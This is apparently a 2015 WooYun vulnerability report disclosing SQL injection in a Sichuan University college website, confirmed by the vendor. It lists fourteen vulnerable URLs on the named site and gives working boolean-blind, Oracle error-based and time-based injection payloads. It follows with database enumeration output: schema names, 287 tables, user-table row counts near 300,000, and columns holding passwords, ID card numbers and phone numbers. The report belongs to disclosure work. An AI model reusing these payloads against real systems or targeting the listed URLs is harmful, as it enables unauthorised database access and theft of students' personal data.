当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157934

漏洞标题:四川大学某学院SQL注入打包(涉及30w用户)

相关厂商:四川大学信息管理中心

漏洞作者: 路人甲

提交时间:2015-12-03 15:54

修复时间:2016-01-17 17:46

公开时间:2016-01-17 17:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

详细说明:

http://www.scude.cc/webpage/news.jsp?na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1
http://www.scude.cc/student_s2008/activity/activityView.jsp?id=19673
http://www.scude.cc/student_s2008/studentInfo/studentinfo_view.jsp?id=318
http://www.scude.cc/student_s2008/faq/FAQList.jsp?type=2
http://www.scude.cc/net_register/register/departmentView.jsp?code=01
http://www.scude.cc/scu/xyyw/xyyw.jsp?id=10629
http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/forms.jsp?keyword=&count=50
http://www.scude.cc/wangluo/publicInfo/jiaowuguanli/files.jsp?keyword=&count=50
http://www.scude.cc/student_s2008/faq/FAQ_view.jsp?id=50195
http://www.scude.cc/student_s2008/faq/FAQList.jsp?keyword=&count=50&type=2
http://www.scude.cc/student_s2008/play_article/play_article_layout.jsp?subjectid=4
http://www.scude.cc/student_s2008/play_article/comment_on.jsp?layout_id=41
http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362
http://www.scude.cc/student_s2008/play_7/photo_layout.jsp?topage=279&subjectid=7&onclick=2362


Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 AND 4830=4830
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 AND 2113=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (2113=2113) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(118)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: na=%D1%A7%D4%BA%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&type=1 AND 1159=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(75)||CHR(122)||CHR(70),5)
---
web application technology: JSP
back-end DBMS: Oracle
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DEVELOP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SCUDE_THESIS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] THESIS
[*] TSMSYS
[*] WMSYS
[*] XDB

漏洞证明:

back-end DBMS: Oracle
Database: DEVELOP
[287 tables]
+------------------------------+
| ADDRESSLIST |
| BASE_COLLEGE |
| BASE_COLLEGER |
| BASE_CONNECTOR |
| BASE_DEPARTMENT |
| BASE_GROUP |
| BASE_LEARNCENTER |
| BASE_PROVINCE |
| BASE_ROLE |
| BASE_SCHOOLER |
| BASE_STAFF |
| BASE_STUDENT |
| BASE_TEACHER |
| BASE_USER |
| BBS_ACTLOG |
| BBS_ATTACHMENT |
| BBS_CATEGORY |
| BBS_FORUM |
| BBS_PHRASES |
| BBS_THREAD |
| BBS_TOPIC |
| BBS_USERINFO |
| CLASS |
| CLASS_TMP |
| CLASS_TONGJI |
| COLLEGE |
| COLLEGE_COURSE |
| COLLEGE_SP |
| COLLEGE_STUDENTSCORE |
| COURSE |
| COURSERESOURCE |
| COURSEWARE |
| COURSEWAREID |
| COURSE_COURSEWARE |
| COURSE_RESOURCE |
| DATUMDOC |
| DELETE_STU_USERS |
| DELETE_USERS |
| DEPART |
| DEPARTMENT |
| DEPARTMENT_LXFX |
| DEPARTMENT_SUB |
| DISCMANAGE |
| ENGLISHAPPLICATION |
| ENGLISHAPPLICATIONTIME |
| EXAMPACKAGE_INFO |
| EXAMPACKAGE_INFO_BAK |
| EXAMPACKAGE_INFO_U4 |
| EXAMPACKGE_OPEN_INFO |
| EXAMTIME |
| EXCELLENT_STUDENT_BATCH |
| EXCELLENT_STUDENT_LIST |
| FAMOUS_TEACHER |
| FAQ |
| FAQ_TYPE |
| FAZHANTMP |
| FAZHAN_RESULT |
| FILEATTACHMENT |
| FRESHMAN_CHANGE1 |
| GRADUATED_STUDENT |
| HOMEPAGE_DETAIL |
| HOMEWORK |
| HOMEWORKENDSCORE |
| HOMEWORKINSTANCE |
| HOMEWORK_JUDGEMENT |
| HOMEWORK_MULTISELECTION |
| HOMEWORK_SCORE_HECHANG_TMP |
| HOMEWORK_SCORE_HECHENG |
| HOMEWORK_SCORE_HECHENG_SAN |
| HOMEWORK_SCORE_LAST |
| HOMEWORK_SCORE_LAST_BAK |
| HOMEWORK_SCORE_SECOND |
| HOMEWORK_SCORE_TEST |
| HOMEWORK_SCORE_TEST2 |
| HOMEWORK_SINGLESELECTION |
| HWANSWER |
| HWLIB |
| HWPAPER |
| HWPAPERITEMS |
| HW_HOMEWORK |
| HW_HOMEWORKINSTANCE |
| HW_HOMEWORKINSTANCE_TEMP |
| HW_HOMEWORKINSTANCE_TEMP2 |
| HW_HOMEWORK_JUDGEMENT |
| HW_HOMEWORK_MULTISELECTION |
| HW_HOMEWORK_SINGLESELECTION |
| HW_JUDGEMENT |
| HW_SELECTION |
| HW_SELECTIONOPTION |
| HW_SELECTION_SELECTIONOPTION |
| HW_WORKANSWER |
| HW_WORKRECORD |
| HW_WORKRECORD_ANSWERS |
| HW_WORKRECORD_BAK |
| HW_WORKRECORD_ST |
| IMAGE |
| IMAGE2_TEMP |
| JANNOUNCE |
| JDKSH |
| JDOWNLOADFILES |
| JDOWNLOADFILESDIR |
| JIAOCAI_LIST |
| JIAOCAI_LIST2 |
| JIKAO_SCORE |
| JP_COURSE |
| JP_FORUM |
| JP_FORUM_REVERT |
| JP_FORUM_TOPIC |
| JSHOUSE |
| J_AFID_DFID |
| LEARNCENTERCONNECTOR |
| LISTATTACHMENT |
| LOGINBANK_LOG |
| LW_ATTACHMENT |
| LW_SET |
| LW_USERS |
| LW_XT |
| MANAGER |
| MEMO |
| MESSAGE_BOARD |
| MIYTEMP |
| MIYTEST |
| MYFRIEND |
| NEWSTYPE |
| NJNB |
| NOPHOTO |
| NOTE |
| OATONGKAO |
| OPEN_LEARNCENTER |
| OPEN_SCORE |
| OPEN_STUDENT |
| OPEN_TUITIONRECORD |
| OPEN_TUITIONSTANDARD |
| PHOTO |
| PICTUREUPLOADDIR |
| PLAN_TABLE |
| PLAY_ARTICLE |
| PLAY_ARTICLE_LAYOUT |
| PLAY_ARTICLE_PL |
| PLAY_ATTACHMENT |
| PLAY_INPUT |
| PLAY_LAYOUT |
| PLAY_LAYOUT_HD |
| PLAY_PHOTO |
| PLAY_PHOTOB |
| PLAY_PHOTO_GUIDANG |
| PLAY_REGISTER |
| PLAY_REGISTERTEACHER |
| PLAY_SUBJECT |
| PLAY_SUBJECT_TYPE |
| PRACTICE_BATCH |
| PRACTICE_CONTENT |
| PRACTICE_COURSE |
| PRACTICE_GRADE |
| PRACTICE_MATCHTEACHER |
| PRACTICE_TOPIC |
| PRE_STUDENT |
| PS_RESOURCE_SCORE |
| PS_RESOURCE_SCORE_BAK |
| PS_RESOURCE_VIEW |
| PUBLICRESOURCE |
| QK_SET |
| QZPXS |
| RECORD_SCORE |
| RECRUIT_TIME |
| RESOURCE_LIST |
| RESOURCE_STUDENT |
| RESOURCE_STUDENT_DETAIL |
| RESOURCE_STUDENT_DETAIL_BAK |
| RESOURCE_STUDENT_TOTAL |
| REVIEWDOC |
| ROLE |
| SCOREJIDIAN |
| SCORE_EXERCISE |
| SCORE_SCALE |
| SCORE_TTUTORSHIP |
| SCORE_UPLOAD |
| SCORE_UPLOAD_BAK |
| SCUDE_BBS_ACTLOG |
| SCUDE_BBS_ATTACHMENT |
| SCUDE_BBS_CATEGORY |
| SCUDE_BBS_COURSE |
| SCUDE_BBS_FORUM |
| SCUDE_BBS_POST |
| SCUDE_BBS_ROLE |
| SCUDE_BBS_TOPIC |
| SCUDE_BBS_USER |
| SCUDE_BBS_USERFACE |
| SCUDE_BBS_USER_FORUM |
| SELECTION |
| SELECTIONOPTION |
| SELECTION_SELECTIONOPTION |
| SEMESTERREG |
| SJKC |
| SPECIALITY |
| SPECIALITYINFO |
| SPECIALITYLIST |
| SPECIALITYRESOURCE |
| SP_BAK |
| STUDENTID_ALTER |
| STUDENTINFO |
| STUDENTINPUTTABLE |
| STUDENTINPUTTABLE1 |
| STUDENTINPUT_JCQK |
| STUDENTRECORD |
| STUDENT_FEESTANDARD |
| STUDENT_HWINFO |
| STUDENT_HWSCORE |
| STUDENT_MOVE |
| STUDENT_MOVE_SCORE |
| STUDENT_MOVE_TYPE |
| STUDENT_SCORE |
| STUDENT_SCORE1127 |
| STUDENT_SCORE_GUIDANG |
| STUDENT_SCORE_JIANKONG |
| STUDENT_SCORE_KAOSHI |
| STUDENT_SCORE_KAOSHI_BAK1 |
| STUDENT_SCORE_KAOSHI_MD |
| STUDENT_SCORE_KAOSHI_U4 |
| STUDENT_SCORE_RE_TMP |
| STUDENT_SCORE_TMP |
| STUDENT_SCORE_TMP_BAK |
| STUDENT_SCORE_TMP_COPY |
| STUDENT_SCORE_TMP_ZUOYE |
| STUDENT_SCORE_TONGJI |
| STUDY_STYLE |
| STU_USERS |
| STU_USERS_COPY |
| STU_USERS_MODI |
| STU_USERS_ZAIJI |
| SUBJECT |
| TABLE_FILE |
| TCHPROGRESS |
| TCHPROGRESS_BEIFEN |
| TCHSCHEDULE |
| TEACHERSCORE |
| TEACHER_HWCODE |
| TEACHER_ZC |
| TESTTYPE |
| THESIS_MANAGER_ROLE |
| TIMESET |
| TK |
| TMP |
| TONGKAOSCORE |
| TONGKAOSCORE20130116QIAN |
| TONGKAOSCORE_JIANKONG |
| TONGKAOSCORE_TEST |
| TONGKAO_MODIFY |
| TONGKAO_SCORE |
| TONGKAO_SCORE_SOURCE |
| TONGKAO_TONGJI |
| TUITIONDISKRECORD |
| TUITIONRECORD |
| TUITIONSTANDARD |
| T_RETRIEVE_LOG |
| T_STUDENT_PAY |
| USERS |
| USERS_LOGIN_DETAIL |
| USERS_LOGIN_RECORD |
| USERS_LOGIN_RECORD_20080710 |
| USERS_TMP |
| VOTESOURCE |
| VOTE_DIANXIN |
| VOTE_FAQ |
| WEILINGZ |
| WEILINGZ2 |
| WISDOM |
| WORKANSWER |
| WORKRECORD |
| WORKRECORD_ANSWERS |
| XJQC |
| XJQC2014 |
| XJQC20141211 |
| XJQC_FJ |
| XJQC_GRADUATE |
| XSDOWNLOAD |
| XSUPLOAD |
| XSXXPT |
| XW |
| YOUJI |
| YUNXING_COURSE_MODIFY |
| YUNXING_SCHEDULE_MODIFY |
| ZHAOSHENG_SCHOOL |
| ZHAOSHENG_SPECIALITY |
| ZHAOSHENG_STUDENT_NEW |
| ZHAOSHENG_STUDYSTYLE |
| ZXSMD |
+------------------------------+
back-end DBMS: Oracle
Database: DEVELOP
+----------------+---------+
| Table | Entries |
+----------------+---------+
| USERS | 184633 |
| STU_USERS | 149207 |
| SCUDE_BBS_USER | 30292 |
| DELETE_USERS | 4203 |
| BASE_USER | 239 |
+----------------+---------+
Database: DEVELOP
Table: USERS
[45 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| A_DEGREE | NUMBER |
| ADDRESS | VARCHAR2 |
| ANSWER | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| BORN | VARCHAR2 |
| CARDTYPE | VARCHAR2 |
| CITY | NUMBER |
| DEGREE | VARCHAR2 |
| E_LEVEL | VARCHAR2 |
| EMAIL | VARCHAR2 |
| G_SCHOOL | VARCHAR2 |
| G_SPECIALITY | VARCHAR2 |
| G_TIME | VARCHAR2 |
| GID | VARCHAR2 |
| GRADUATEID | VARCHAR2 |
| HASHOMEPAGE | VARCHAR2 |
| HOMEPAGE | VARCHAR2 |
| IP | VARCHAR2 |
| NATIONALITY | VARCHAR2 |
| NUMBERID | VARCHAR2 |
| OCCUPATION | VARCHAR2 |
| P_SPECIALITY | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PAYMENT | NUMBER |
| POSTALCODE | VARCHAR2 |
| POWER | NUMBER |
| QUESTION | VARCHAR2 |
| REALNAME | VARCHAR2 |
| RECENT_IP | VARCHAR2 |
| RECENT_TIME | DATE |
| REG_EMAIL | VARCHAR2 |
| REG_TIME | DATE |
| RESUME | VARCHAR2 |
| SCORE | NUMBER |
| SEX | VARCHAR2 |
| SIGN | VARCHAR2 |
| STATUS | VARCHAR2 |
| STOPCAUSE | VARCHAR2 |
| STUDY_STYLE | VARCHAR2 |
| TEL | VARCHAR2 |
| TONGKAOID | VARCHAR2 |
| TYPE | VARCHAR2 |
| USERID | NUMBER |
| USERNAME | VARCHAR2 |
| USERNAME_NEW | VARCHAR2 |
+--------------+----------+
Database: DEVELOP
Table: STU_USERS
[43 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| LANGUAGE | VARCHAR2 |
| ADDRESS | VARCHAR2 |
| BIRTHDAY | VARCHAR2 |
| CARDTYPE | VARCHAR2 |
| CHECKRESULT | VARCHAR2 |
| CHECKTIME | VARCHAR2 |
| CIVILIZATION | VARCHAR2 |
| CLASSCODE | VARCHAR2 |
| COMPANY | VARCHAR2 |
| CONFIRMDATE | DATE |
| CONFIRMIP | VARCHAR2 |
| CREDITRELIEF | NUMBER |
| EMAIL | VARCHAR2 |
| EN_CHECK_RESULT | VARCHAR2 |
| ENROLLMENT | VARCHAR2 |
| ENROLLTIME | VARCHAR2 |
| ENROLLTYPE | VARCHAR2 |
| EXAMID | VARCHAR2 |
| GRADUATEDATE | VARCHAR2 |
| GRADUATEID | VARCHAR2 |
| GRADUATENUMBER | VARCHAR2 |
| GRADUATESCHOOL | VARCHAR2 |
| GRADUATESPECIA | VARCHAR2 |
| GRADUATETIME | VARCHAR2 |
| IDCARD | VARCHAR2 |
| MOBILE | VARCHAR2 |
| NATIONALITY | VARCHAR2 |
| OCCUPATION | VARCHAR2 |
| PHONE | VARCHAR2 |
| POLITICS | VARCHAR2 |
| POSTCODE | VARCHAR2 |
| PRECREDIT | NUMBER |
| PRINT | NUMBER |
| PRINT_GRADUATE | NUMBER |
| REALNAME | VARCHAR2 |
| REMARK | VARCHAR2 |
| SEX | VARCHAR2 |
| SPECIALITYCODE | VARCHAR2 |
| STATUS | VARCHAR2 |
| TUITION | VARCHAR2 |
| USERNAME | VARCHAR2 |
| XUEJISTATUS | VARCHAR2 |
| XUEZHI | VARCHAR2 |
+-----------------+----------+


s1.png


s3.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-03 17:44

厂商回复:

谢谢可爱的白帽子,已经转告相关部门。

最新状态:

暂无